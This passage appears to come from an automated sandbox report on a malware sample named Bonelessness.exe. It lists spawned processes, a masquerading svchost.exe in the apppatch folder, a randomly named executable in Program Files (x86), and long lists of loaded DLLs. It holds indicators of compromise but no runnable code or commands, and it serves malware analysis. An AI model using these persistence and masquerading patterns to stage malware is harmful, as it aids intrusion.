      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 7140 -ip 7140Jump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe "C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe" Jump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe "C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe" Jump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe "C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe" Jump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 208 -p 7124 -ip 7124Jump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe "C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe" Jump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknown
      Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknown
      Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknown
      Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknown
      Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknown
      Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknown
      Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknown
      Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknown
      Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknown
      Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknown
      Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknown
      Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknown
      Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknown
      Source: C:\Users\user\Desktop\Bonelessness.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\Bonelessness.exeSection loaded: inetcomm.dllJump to behavior
      Source: C:\Users\user\Desktop\Bonelessness.exeSection loaded: oledlg.dllJump to behavior
      Source: C:\Users\user\Desktop\Bonelessness.exeSection loaded: msoert2.dllJump to behavior
      Source: C:\Users\user\Desktop\Bonelessness.exeSection loaded: oleacc.dllJump to behavior
      Source: C:\Users\user\Desktop\Bonelessness.exeSection loaded: inetres.dllJump to behavior
      Source: C:\Users\user\Desktop\Bonelessness.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\Desktop\Bonelessness.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\Bonelessness.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\Bonelessness.exeSection loaded: mpclient.dllJump to behavior
      Source: C:\Users\user\Desktop\Bonelessness.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\Bonelessness.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Bonelessness.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\Bonelessness.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\Bonelessness.exeSection loaded: firewallapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Bonelessness.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Bonelessness.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Bonelessness.exeSection loaded: fwbase.dllJump to behavior
      Source: C:\Users\user\Desktop\Bonelessness.exeSection loaded: fwpolicyiomgr.dllJump to behavior
      Source: C:\Users\user\Desktop\Bonelessness.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\apppatch\svchost.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Windows\apppatch\svchost.exeSection loaded: inetcomm.dllJump to behavior
      Source: C:\Windows\apppatch\svchost.exeSection loaded: oledlg.dllJump to behavior
      Source: C:\Windows\apppatch\svchost.exeSection loaded: msoert2.dllJump to behavior
      Source: C:\Windows\apppatch\svchost.exeSection loaded: oleacc.dllJump to behavior
      Source: C:\Windows\apppatch\svchost.exeSection loaded: inetres.dllJump to behavior
      Source: C:\Windows\apppatch\svchost.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\apppatch\svchost.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\apppatch\svchost.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\apppatch\svchost.exeSection loaded: mpclient.dllJump to behavior
      Source: C:\Windows\apppatch\svchost.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\apppatch\svchost.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\apppatch\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\apppatch\svchost.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\apppatch\svchost.exeSection loaded: firewallapi.dllJump to behavior
      Source: C:\Windows\apppatch\svchost.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\apppatch\svchost.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\apppatch\svchost.exeSection loaded: fwbase.dllJump to behavior
      Source: C:\Windows\apppatch\svchost.exeSection loaded: fwpolicyiomgr.dllJump to behavior
      Source: C:\Windows\apppatch\svchost.exeSection loaded: winscard.dllJump to behavior
      Source: C:\Windows\apppatch\svchost.exeSection loaded: devobj.dllJump to behavior
      Source: C:\Windows\apppatch\svchost.exeSection loaded: sensapi.dllJump to behavior
      Source: C:\Windows\apppatch\svchost.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\apppatch\svchost.exeSection loaded: dbghelp.dllJump to behavior
      Source: C:\Windows\apppatch\svchost.exeSection loaded: dbgcore.dllJump to behavior
      Source: C:\Windows\apppatch\svchost.exeSection loaded: netapi32.dllJump to behavior
      Source: C:\Windows\apppatch\svchost.exeSection loaded: samcli.dllJump to behavior
      Source: C:\Windows\apppatch\svchost.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\apppatch\svchost.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\apppatch\svchost.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Windows\apppatch\svchost.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\apppatch\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\apppatch\svchost.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\apppatch\svchost.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\apppatch\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\apppatch\svchost.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\apppatch\svchost.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\apppatch\svchost.exeSection loaded: napinsp.dllJump to behavior
      Source: C:\Windows\apppatch\svchost.exeSection loaded: pnrpnsp.dllJump to behavior
      Source: C:\Windows\apppatch\svchost.exeSection loaded: wshbth.dllJump to behavior
      Source: C:\Windows\apppatch\svchost.exeSection loaded: nlaapi.dllJump to behavior
      Source: C:\Windows\apppatch\svchost.exeSection loaded: winrnr.dllJump to behavior
      Source: C:\Windows\apppatch\svchost.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\apppatch\svchost.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\apppatch\svchost.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Windows\apppatch\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Windows\apppatch\svchost.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\apppatch\svchost.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\apppatch\svchost.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Windows\apppatch\svchost.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\apppatch\svchost.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\apppatch\svchost.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\apppatch\svchost.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\apppatch\svchost.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\apppatch\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeSection loaded: winscard.dllJump to behavior
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeSection loaded: devobj.dllJump to behavior
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeSection loaded: sensapi.dllJump to behavior
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeSection loaded: dbghelp.dllJump to behavior
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeSection loaded: dbgcore.dllJump to behavior
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeSection loaded: netapi32.dllJump to behavior
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeSection loaded: samcli.dllJump to behavior
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeSection loaded: winscard.dllJump to behavior
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeSection loaded: devobj.dllJump to behavior
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeSection loaded: sensapi.dllJump to behavior
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeSection loaded: dbghelp.dllJump to behavior
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeSection loaded: dbgcore.dllJump to behavior
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeSection loaded: netapi32.dllJump to behavior
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeSection loaded: samcli.dllJump to behavior
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: wersvc.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: windowsperformancerecordercontrol.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: weretw.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: wer.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: faultrep.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: dbghelp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: dbgcore.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: wer.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
